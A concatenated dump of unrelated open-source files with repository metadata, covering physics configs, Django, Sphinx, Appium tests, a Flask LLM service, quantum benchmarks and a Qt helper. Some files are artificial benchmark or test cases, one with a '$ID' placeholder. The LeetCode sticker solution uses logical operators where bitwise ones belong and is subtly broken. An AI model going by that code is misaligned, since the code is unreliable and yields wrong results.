Generation().addTool( Special )
Generation().Special.ProductionTool = "BcVegPyProduction"
Generation().PileUpTool = "FixedLuminosityForRareProcess"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/Bc_Bdpi+,KK=BcVegPy,DecProdCut.dec"
Generation().Special.CutTool = "BcDaughtersInLHCb"
| [
"slavomirastefkova@b2pcx39016.desy.de"
] | slavomirastefkova@b2pcx39016.desy.de |
1626fb780031dc410b6a61f8a143c903187cca5f | 3922e9b41bf8bf5dd0a0d9abc8852d147a02db0f | /articles/build/lib.linux-i686-2.7/migrations/0007_article_details_time.py | 9db06b6092089d394cf6015df2b0f59025538157 | [] | no_license | levi-p/market | 3ddd0ca20818139c96fa102256f21249d85f104f | 5deb8dbf83ddeb07415bd21703b57f3c3d54aa54 | refs/heads/master | 2020-07-10T18:03:30.316598 | 2017-01-20T15:00:39 | 2017-01-20T15:00:39 | 67,126,320 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 517 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-08-22 16:14
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('articles', '0006_auto_20160808_1530'),
]
operations = [
migrations.AddField(
model_name='article_details',
name='time',
field=models.DateField(default=datetime.datetime(2016, 8, 22, 16, 14, 20, 530291)),
),
]
| [
"levipda@gmail.com"
] | levipda@gmail.com |
386e9f87de2b8a14c1f22d2e81b9b26ff7240681 | e76fda1fba459456c4bc105e7a6dcc6277a1a26c | /a_bite_of_python/20-keyword_only.py | e71eba82c6f9c7dd4676247a610cbae522e006aa | [] | no_license | lafabo/i-love-tutorials | 6bb2a684a201975ab523d9721b02761a6269853c | eafcd47fd62e770107c7e1f08e0d6d60a539f1ec | refs/heads/master | 2021-01-21T04:46:56.365199 | 2016-07-20T17:38:03 | 2016-07-20T17:38:03 | 47,709,568 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 216 | py | def total(initial=5, *numbers, extra_number):
count = initial
for number in numbers:
count += number
count += extra_number
print(count)
total(10, 1, 2, 3, extra_number=50)
total(10, 1, 2 ,3)
| [
"lazyfatboy@ya.ru"
] | lazyfatboy@ya.ru |
528f2d2fd54dc7fe09e75f50c0c94d71c27c51db | 505f1c36d931d4388a0a4f8c57fbd8bd9ab4d821 | /ImageAnalysis/ImageAnalysis/python/docs/conf.py | 4bd685e97dd796c81348cf542b1c3ba2c06100fd | [
"MIT"
] | permissive | mikebourbeauart/perler-printer | 9e43a51b82cb9b08d35c81e680ea7ef2624fda2e | 8c5023de6bb9b3cbe2bc28c1c823030dfd708db4 | refs/heads/master | 2022-12-01T18:46:37.632443 | 2020-05-04T00:41:11 | 2020-05-04T00:41:11 | 98,070,537 | 0 | 1 | MIT | 2022-11-22T05:58:34 | 2017-07-23T02:49:35 | Python | UTF-8 | Python | false | false | 5,452 | py | # -*- coding: utf-8 -*-
#
# Perler Printer documentation build configuration file, created by
# sphinx-quickstart on Mon Oct 09 14:05:44 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
#sys.path.insert(0, os.path.abspath('../source'))
#sys.path.insert(0, os.path.abspath('../source/arduino-comms'))
#sys.path.insert(0, os.path.abspath('../source/image-parsing'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.viewcode',
'sphinx.ext.todo']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Perler Printer'
copyright = u'2017, Mike Bourbeau'
author = u'Mike Bourbeau'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'1.0'
# The full version, including alpha/beta/rc tags.
release = u'1.0.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# This is required for the alabaster theme
# refs: http://alabaster.readthedocs.io/en/latest/installation.html#sidebars
html_sidebars = {
'**': [
'about.html',
'navigation.html',
'relations.html', # needs 'show_related': True theme option to display
'searchbox.html',
'donate.html',
]
}
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'PerlerPrinterdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'PerlerPrinter.tex', u'Perler Printer Documentation',
u'Mike Bourbeau', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'perlerprinter', u'Perler Printer Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'PerlerPrinter', u'Perler Printer Documentation',
author, 'PerlerPrinter', 'One line description of project.',
'Miscellaneous'),
]
| [
"borbs727@gmail.com"
] | borbs727@gmail.com |
c0ca7088e2f0c17f756d8e622ffba7be75a25e7d | a2e673ba5797c242af20821075d76e84113d9503 | /Capitulo 2/Capitulo2-Decisoes.py | f55b8678aac544b2a5f1b22568957305bbdef20a | [] | no_license | Elvis-Lopes/Python-Fiap | ac0a09f44c67b9106a607b7e8082ce0248000316 | 1c10015155f84c8ddee5c8dbd7b21712741e1d1c | refs/heads/master | 2023-06-02T04:37:54.723196 | 2021-06-23T20:37:56 | 2021-06-23T20:37:56 | 377,885,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | nome = input("Digite o nome: ")
idade = int(input("Digite a idade: "))
prioridade = "Não"
if idade >= 65:
prioridade = "Sim"
print(f'paciente: {nome}\n'
f'Idade: {idade} anos\n'
f'Prioridade: {prioridade}')
else:
print(f'paciente: {nome}\n'
f'Idade: {idade} anos\n'
f'Prioridade: {prioridade}') | [
"elvislopes1996@hotmail.com"
] | elvislopes1996@hotmail.com |
8823445b94c9ad0e843e1f5cf51ff814a3180a57 | 32eeb97dff5b1bf18cf5be2926b70bb322e5c1bd | /benchmark/amme/testcase/firstcases/testcase6_025.py | 874c6af813752507bf19190adc33729e91e453ef | [] | no_license | Prefest2018/Prefest | c374d0441d714fb90fca40226fe2875b41cf37fc | ac236987512889e822ea6686c5d2e5b66b295648 | refs/heads/master | 2021-12-09T19:36:24.554864 | 2021-12-06T12:46:14 | 2021-12-06T12:46:14 | 173,225,161 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,763 | py | #coding=utf-8
import os
import subprocess
import time
import traceback
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException, WebDriverException
desired_caps = {
'platformName' : 'Android',
'deviceName' : 'Android Emulator',
'platformVersion' : '4.4',
'appPackage' : 'com.money.manager.ex',
'appActivity' : 'com.money.manager.ex.home.MainActivity',
'resetKeyboard' : True,
'androidCoverage' : 'com.money.manager.ex/com.money.manager.ex.JacocoInstrumentation',
'noReset' : True
}
def command(cmd, timeout=5):
p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
time.sleep(timeout)
p.terminate()
return
def getElememt(driver, str) :
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str)
return element
def getElememtBack(driver, str1, str2) :
for i in range(0, 2, 1):
try:
element = driver.find_element_by_android_uiautomator(str1)
except NoSuchElementException:
time.sleep(1)
else:
return element
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str2)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str2)
return element
def swipe(driver, startxper, startyper, endxper, endyper) :
size = driver.get_window_size()
width = size["width"]
height = size["height"]
try:
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
except WebDriverException:
time.sleep(1)
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
return
# testcase025
try :
starttime = time.time()
driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
element = getElememtBack(driver, "new UiSelector().text(\"$ 0.00\")", "new UiSelector().className(\"android.widget.TextView\").instance(7)")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/menu_period\").className(\"android.widget.TextView\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/radio\").className(\"android.widget.RadioButton\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/menuTransactionFilters\").className(\"android.widget.TextView\")")
TouchAction(driver).long_press(element).release().perform()
element = getElememt(driver, "new UiSelector().className(\"android.widget.ImageButton\").description(\"Open\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/fab\").className(\"android.widget.ImageButton\")")
TouchAction(driver).tap(element).perform()
driver.press_keycode(4)
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/menuTransactionStatusSelector\").className(\"android.widget.TextView\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/checkbox\").className(\"android.widget.CheckBox\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/menuTransactionStatusSelector\").className(\"android.widget.TextView\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/checkbox\").className(\"android.widget.CheckBox\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().className(\"android.widget.ImageButton\").description(\"Open\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/fab\").className(\"android.widget.ImageButton\")")
TouchAction(driver).tap(element).perform()
element = getElememtBack(driver, "new UiSelector().text(\"Donate\")", "new UiSelector().className(\"android.widget.Button\")")
TouchAction(driver).tap(element).perform()
driver.press_keycode(4)
driver.press_keycode(4)
element = getElememtBack(driver, "new UiSelector().text(\"test\")", "new UiSelector().className(\"android.widget.TextView\")")
TouchAction(driver).long_press(element).release().perform()
element = getElememtBack(driver, "new UiSelector().text(\"test\")", "new UiSelector().className(\"android.widget.TextView\")")
TouchAction(driver).tap(element).perform()
element = getElememtBack(driver, "new UiSelector().text(\"test\")", "new UiSelector().className(\"android.widget.TextView\")")
TouchAction(driver).tap(element).perform()
driver.press_keycode(82)
except Exception, e:
print 'FAIL'
print 'str(e):\t\t', str(e)
print 'repr(e):\t', repr(e)
print traceback.format_exc()
else:
print 'OK'
finally:
cpackage = driver.current_package
endtime = time.time()
print 'consumed time:', str(endtime - starttime), 's'
command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"6_025\"")
jacocotime = time.time()
print 'jacoco time:', str(jacocotime - endtime), 's'
driver.quit()
if (cpackage != 'com.money.manager.ex'):
cpackage = "adb shell am force-stop " + cpackage
os.popen(cpackage) | [
"prefest2018@gmail.com"
] | prefest2018@gmail.com |
2670acdaad0515f6c6a13dbfbff6a59c8b062e01 | 500bca3e22bd0c30c79b74918e9847742b3c428e | /sdk/python/endpoints/online/llm/src/sk/app.py | 6c4efd2ff36aeba32c63d59cd924d39133854683 | [
"MIT"
] | permissive | Azure/azureml-examples | 2304c862fd2e36e6640ecc4d09f69c5ed93b48ab | e5f7b247d4753f115a8f7da30cbe25294f71f9d7 | refs/heads/main | 2023-08-31T00:10:14.107509 | 2023-08-30T17:29:22 | 2023-08-30T17:29:22 | 289,334,021 | 1,219 | 1,074 | MIT | 2023-09-14T16:00:55 | 2020-08-21T18:04:26 | Jupyter Notebook | UTF-8 | Python | false | false | 4,917 | py | from __future__ import annotations
import sys, os, json
from flask import Flask, request
import semantic_kernel as sk
import semantic_kernel.connectors.ai.open_ai as sk_oai
from semantic_kernel.planning.basic_planner import BasicPlanner
from semantic_kernel.planning.plan import Plan
from azure.identity import DefaultAzureCredential, AzureCliCredential
# add parent directory to path
sys.path.insert(0, str(os.path.abspath(os.path.join(os.path.dirname(__file__), "../"))))
import utils
openai_config: utils.OpenAIConfig = None
IS_CHAT_COMPLETION = None
import importlib
importlib.reload(utils)
# set to true for chat completion API, false for text completion
IS_CHAT_COMPLETION = True
credential = DefaultAzureCredential(additionally_allowed_tenants=["*"])
def init() -> tuple[sk.Kernel, BasicPlanner]:
utils.load_secrets(credential)
load_env_vars()
kernel = create_kernel(debug=False)
planner = BasicPlanner()
return kernel, planner
def load_env_vars():
global openai_config
openai_config = utils.OpenAIConfig.from_env()
global IS_CHAT_COMPLETION
IS_CHAT_COMPLETION = bool(os.environ.get("IS_CHAT_COMPLETION"))
def import_skills(kernel: sk.Kernel, skills_folder: str):
print(f"Importing skills from {skills_folder}")
for skill_name in os.listdir(skills_folder):
skill_full_path = os.path.join(skills_folder, skill_name)
print(f"== Importing skill {skill_name}: {skill_full_path}")
kernel.import_semantic_skill_from_directory(skills_folder, skill_name)
def create_kernel(debug: bool = False) -> sk.Kernel:
logger = sk.NullLogger()
if debug:
import logging
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
formatter = logging.Formatter(
"%(asctime)s - %(name)s - %(levelname)s - %(message)s"
)
handler.setFormatter(formatter)
logger.handlers.clear()
logger.addHandler(handler)
kernel = sk.Kernel()
if openai_config.OPENAI_API_TYPE == "azure":
# if using chat service from Azure OpenAI API, use AzureChatCompletion
kernel.add_text_completion_service(
"completion",
sk_oai.AzureChatCompletion(
deployment_name=openai_config.AZURE_OPENAI_API_DEPLOYMENT_NAME,
api_key=openai_config.OPENAI_API_KEY,
endpoint=openai_config.AZURE_OPENAI_API_ENDPOINT,
)
if IS_CHAT_COMPLETION
else sk_oai.AzureTextCompletion(
deployment_name=openai_config.AZURE_OPENAI_API_DEPLOYMENT_NAME,
api_key=openai_config.OPENAI_API_KEY,
endpoint=openai_config.AZURE_OPENAI_API_ENDPOINT,
),
)
else:
print(
"using openai", openai_config.OPENAI_MODEL_ID, openai_config.OPENAI_ORG_ID
)
kernel.add_text_completion_service(
"completion",
sk_oai.OpenAIChatCompletion(
openai_config.OPENAI_MODEL_ID,
openai_config.OPENAI_API_KEY,
openai_config.OPENAI_ORG_ID,
)
if IS_CHAT_COMPLETION
else sk_oai.OpenAITextCompletion(
openai_config.OPENAI_MODEL_ID,
openai_config.OPENAI_API_KEY,
openai_config.OPENAI_ORG_ID,
),
)
# import skills from skills folder
import_skills(
kernel, os.path.join(os.path.dirname(os.path.realpath(__file__)), "skills")
)
return kernel
kernel, planner = init()
async def invoke_skill(skillName, functionName, context):
skillFunction = kernel.func(skillName, functionName)
return await skillFunction.invoke_async(context=context)
# class for plan deserializing
class GeneratedPlan:
def __init__(self, result: str):
self.result = result
app = Flask(__name__)
@app.route("/", methods=["GET"])
def home():
return "ok"
@app.route("/health", methods=["GET"])
def health():
return "healthy"
@app.route("/skills/<skillName>/invoke/<functionName>", methods=["POST"])
async def invoke(skillName, functionName):
return await invoke_skill(skillName, functionName, request.get_json())
@app.route("/planner/createplan", methods=["POST"])
async def createplan():
body = request.get_json()
goal = body["value"]
plan = await planner.create_plan_async(goal, kernel)
print(plan.generated_plan.result)
return plan.generated_plan.result
@app.route("/planner/executeplan", methods=["POST"])
async def executeplan():
body = request.get_json()
print(body)
gp = GeneratedPlan(result=json.dumps(body))
p = Plan(goal=None, prompt=None, plan=gp)
result = await planner.execute_plan_async(p, kernel)
print(result)
return result
if __name__ == "__main__":
app.run(host="0.0.0.0", port=5001)
| [
"noreply@github.com"
] | Azure.noreply@github.com |
66494b274cf67dfca2dac51e878dee4bf7d43575 | c8e6cf760a78ec45dbc2d3b6452e352d12da1f43 | /components/unified_consent/DEPS | 42423010fe2e8b1d84ae25a6998fb403a18a2558 | [
"BSD-3-Clause"
] | permissive | tojoyccnu/chromium | 15479d1d9e8159d5eecd61571d33effa78e573b7 | 8cba72403a712767289acb2c7cd06d1116db42cc | refs/heads/master | 2023-03-04T11:55:25.131615 | 2018-06-26T13:34:07 | 2018-06-26T13:34:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 240 | include_rules = [
"+components/autofill/core/common",
"+components/browser_sync",
"+components/keyed_service/core",
"+components/pref_registry",
"+components/prefs",
"+components/sync/base",
"+services/identity/public/cpp",
]
| [
"commit-bot@chromium.org"
] | commit-bot@chromium.org | |
4bfcfba3cd42fe4b8758370453ea882fa441832f | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /data/p4VQE/R3/benchmark/startPyquil724.py | ea617cb370afcd2e188b6722dbf150be0426ed29 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,254 | py | # qubit number=4
# total number=15
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
prog = Program() # circuit begin
prog += H(0) # number=1
prog += H(1) # number=2
prog += H(2) # number=3
prog += CNOT(0,2) # number=12
prog += X(2) # number=13
prog += CNOT(0,2) # number=14
prog += Y(3) # number=5
prog += SWAP(1,0) # number=7
prog += H(1) # number=11
prog += SWAP(1,0) # number=8
prog += Y(0) # number=9
prog += Y(0) # number=10
# circuit end
return prog
def summrise_results(bitstrings) -> dict:
d = {}
for l in bitstrings:
if d.get(l) is None:
d[l] = 1
else:
d[l] = d[l] + 1
return d
if __name__ == '__main__':
prog = make_circuit()
qvm = get_qc('4q-qvm')
results = qvm.run_and_measure(prog,1024)
bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
bitstrings = [''.join(map(str, l)) for l in bitstrings]
writefile = open("../data/startPyquil724.csv","w")
print(summrise_results(bitstrings),file=writefile)
writefile.close()
| [
"wangjiyuan123@yeah.net"
] | wangjiyuan123@yeah.net |
fe019310e5d9258fe9c864c492fea1db00791b9c | c9dc1ddbcf752318ab5ee42bc997493fbe6c6689 | /electrum_mue/plugins/ledger/cmdline.py | 5c7be960031d3f307d6ba4ea81368a298583e087 | [
"MIT"
] | permissive | Hser2bio/electrum-mue | 7ea770bda0ddfbf81bdda6627e4be2745700ec00 | 5369056b54e862826b6c3132d15ecd3a3d6b6bc0 | refs/heads/master | 2020-12-10T15:13:15.878787 | 2020-01-13T15:37:30 | 2020-01-13T15:37:30 | 233,629,634 | 0 | 0 | MIT | 2020-01-13T15:36:34 | 2020-01-13T15:36:33 | null | UTF-8 | Python | false | false | 402 | py | from electrum_mue.plugin import hook
from .ledger import LedgerPlugin
from ..hw_wallet import CmdLineHandler
class Plugin(LedgerPlugin):
handler = CmdLineHandler()
@hook
def init_keystore(self, keystore):
if not isinstance(keystore, self.keystore_class):
return
keystore.handler = self.handler
def create_handler(self, window):
return self.handler
| [
"sotblad@monetaryunit.org"
] | sotblad@monetaryunit.org |
1db9f9e97f277b0a457c123937a3ea8789882f42 | 30258c8e9c35a21fa3ef13c68dfddd23c56568d6 | /interview_bit/arrays/anti_diagnolas.py | fdf867d0fdc3c9ea09ddccd923fa617706d4387d | [] | no_license | venkatachiranjeevi/algorithms | 3e6d525be36ee34f969d49959df1aaad35fcb1d5 | 83724f647102acba00dd028a81e09888ce980785 | refs/heads/master | 2021-06-11T05:23:57.080523 | 2020-04-14T05:16:20 | 2020-04-14T05:16:20 | 128,548,617 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 440 | py | __author__ = 'venkat'
class Solution:
def diagonal(self, a):
n = len(a)
if n < 2 :
return a
res = []
for i in range((2*(n-1))+1):
temp = []
for j in range(i+1):
if j < n and i-j< n:
temp.append(a[j][i-j])
res.append(temp)
return res
# a = [[1,2,3],[4,5,6],[7,8,9]]
a = [[1,2],[3,4]]
print Solution().diagonal(a) | [
"chiranjeevi.kokku@tjnovandi.com"
] | chiranjeevi.kokku@tjnovandi.com |
f4cd19786978a0c6c8debd52439fa372b7109bce | a8750439f200e4efc11715df797489f30e9828c6 | /LeetCodeContests/53/53_691.py | 511d5fe0c21fd406c29fae78a7dd7384e353ebbe | [] | no_license | rajlath/rkl_codes | f657174305dc85c3fa07a6fff1c7c31cfe6e2f89 | d4bcee3df2f501349feed7a26ef9828573aff873 | refs/heads/master | 2023-02-21T10:16:35.800612 | 2021-01-27T11:43:34 | 2021-01-27T11:43:34 | 110,989,354 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,441 | py | '''
691. Stickers to Spell Word
User Accepted: 81
User Tried: 374
Total Accepted: 86
Total Submissions: 948
Difficulty: Hard
We are given N different types of stickers. Each sticker has a lowercase English word on it.
You would like to spell out the given target string by cutting individual letters from your collection of stickers and
rearranging them.
You can use each sticker more than once if you want, and you have infinite quantities of each sticker.
What is the minimum number of stickers that you need to spell out the target? If the task is impossible, return -1.
Example 1:
Input:
["with", "example", "science"], "thehat"
Output:
3
Explanation:
We can use 2 "with" stickers, and 1 "example" sticker.
After cutting and rearrange the letters of those stickers, we can form the target "thehat".
Also, this is the minimum number of stickers necessary to form the target string.
Example 2:
Input:
["notice", "possible"], "basicbasic"
Output:
-1
Explanation:
We can't form the target "basicbasic" from cutting letters from the given stickers.
Note:
stickers has length in the range [1, 50].
stickers consists of lowercase English words (without apostrophes).
target has length in the range [1, 15], and consists of lowercase English letters.
In all test cases, all words were chosen randomly from the 1000 most common US English words, and the target was chosen as a concatenation of two random words.
The time limit may be more challenging than usual. It is expected that a 50 sticker test case can be solved within 35ms on average.
'''
class Solution:
def minStickers(self, stickers, target):
"""
:type stickers: List[str]
:type target: str
:rtype: int
"""
dp = [0] * (1 << 15)
dp[0]=0
n = len(target)
N = 1 << n
for i in range(N):
if dp[i] == -1 : continue
for j in range(len(stickers)):
curr = i
for k in range(len(stickers[j])):
for r in range(n):
if curr >> r and 1 : continue
if target[r]==stickers[j][k]:
curr = curr or (1<<r)
break
if (dp[curr] ==-1) or (dp[curr] > (dp[i]+1)):
dp[curr] = dp[i] + 1
return dp[N - 1]
sol = Solution()
print(sol.minStickers(["with", "example", "science"], "thehat"))
| [
"raj.lath@gmail.com"
] | raj.lath@gmail.com |
a12029068bf685dcc7c11d2d1ccc4063dd8dbc54 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/pa3/sample/object_attr_get-108.py | e8818fd053b17f5f19744393b5a5a6900ba499ca | [] | no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 182 | py | class A(object):
a:int = 42
class B(A):
b:bool = True
def __init__(self:"B"):
print("B")
a:A = None
b:B = None
a = b = B()
print(a.a)
print(b.$ID)
print(b.b)
| [
"647530+Virtlink@users.noreply.github.com"
] | 647530+Virtlink@users.noreply.github.com |
f1c575c097cde921b3ca5577df204d7ee4135b08 | 1d9e681b204e6ec2d7a710ef45b7dec082239491 | /venv/Lib/site-packages/test/test_leagues_api.py | 48ffc4664efcaf97941442d25c9aa298f62759cf | [] | no_license | 1chimaruGin/DotaAnalysis | 0e0b85805cc83e4cc491d46f7eadc014e8d6b1f1 | 6a74cde2ee400fc0dc96305203d60c5e56d7ecff | refs/heads/master | 2020-07-21T20:48:07.589295 | 2019-09-07T12:20:15 | 2019-09-07T12:20:15 | 206,972,180 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,134 | py | # coding: utf-8
"""
OpenDota API
# Introduction The OpenDota API provides Dota 2 related data including advanced match data extracted from match replays. Please keep request rate to approximately 1/s. **Begining 4/22/2018, the OpenDota API will be limited to 50,000 free calls per month.** We'll be offering a Premium Tier with unlimited API calls and higher rate limits. Check out the [API page](https://www.opendota.com/api-keys) to learn more.
OpenAPI spec version: 17.6.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import od_python
from od_python.rest import ApiException
from od_python.apis.leagues_api import LeaguesApi
class TestLeaguesApi(unittest.TestCase):
""" LeaguesApi unit test stubs """
def setUp(self):
self.api = od_python.apis.leagues_api.LeaguesApi()
def tearDown(self):
pass
def test_leagues_get(self):
"""
Test case for leagues_get
GET /leagues
"""
pass
if __name__ == '__main__':
unittest.main()
| [
"kyitharhein18@gmail.com"
] | kyitharhein18@gmail.com |
ab36dc2d10fb2e290cb55a1c9d512d4acefab8f7 | e7795082c0131682803a09e929a86b2deddeab74 | /common/decorators.py | a2daa4aba896ef449a232fc88e7972e82d3bc2f0 | [
"MIT"
] | permissive | liwanlei/FXTest | 01de3ad55849b16c49d93b58d1aae21fd0fdafa0 | aeda58d01c14194290ca149d411c3a8596cca82d | refs/heads/master | 2023-04-01T15:45:26.668688 | 2023-03-19T05:19:54 | 2023-03-19T05:19:54 | 97,098,845 | 807 | 419 | MIT | 2022-04-23T06:52:16 | 2017-07-13T08:27:48 | Python | UTF-8 | Python | false | false | 342 | py | # -*- coding: utf-8 -*-
# @Date : 2017-08-14 20:58:13
# @Author : lileilei
'''
判断是否是管理员
'''
from flask_login import current_user
def chckuserpermisson():
for rosse in current_user.quanxians:
if int(rosse.rose) == 2 or current_user.is_sper == 1:
return True
else:
return False
| [
"leileili126@163.com"
] | leileili126@163.com |
7a4ea1e22297182f60b7f8fb6604fa106b46ffca | 9c5abcd43318ef7553be95a95a859a0f3e41a467 | /easygraphics/_utils/invoke_in_app_thread.py | 14b67c2f87247464ac457fbf9367817f2f21572d | [
"BSD-3-Clause"
] | permissive | xzy103/PyEasyGraphics | d66da503f601868fe39d404a77b3b8d0a43a2e52 | 16bd6f21dd6f3d76edaab2b533500e9aa789c6b2 | refs/heads/master | 2020-05-19T07:31:22.005958 | 2019-02-25T09:54:41 | 2019-02-25T09:54:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,138 | py | #####################################################################
# #
# invoke_in_main.py #
# #
# Copyright 2013, Christopher Billington, Philip Starkey #
# #
# This file is part of the qtutils project #
# (see https://bitbucket.org/philipstarkey/qtutils ) #
# and is licensed under the 2-clause, or 3-clause, BSD License. #
# See the license.txt file in the root of the project #
# for the full license. #
#
# #
#####################################################################
import functools
# tailored and modified by roy
import sys
import threading
import time
from queue import Queue
from PyQt5 import QtWidgets
from PyQt5.QtCore import QEvent, QObject, QCoreApplication
def _reraise(exc_info):
exc_type, value, traceback = exc_info
raise value.with_traceback(traceback)
class CallEvent(QEvent):
"""An event containing a request for a function call."""
EVENT_TYPE = QEvent(QEvent.registerEventType())
def __init__(self, queue, exceptions_in_main, fn, *args, **kwargs):
QEvent.__init__(self, self.EVENT_TYPE)
self.fn = fn
self.args = args
self.kwargs = kwargs
self._returnval = queue
# Whether to raise exceptions in the main thread or store them
# for raising in the calling thread:
self._exceptions_in_main = exceptions_in_main
class Caller(QObject):
"""An event handler which calls the function held within a CallEvent."""
def event(self, event):
event.accept()
exception = None
try:
result = event.fn(*event.args, **event.kwargs)
except Exception:
# Store for re-raising the exception in the calling thread:
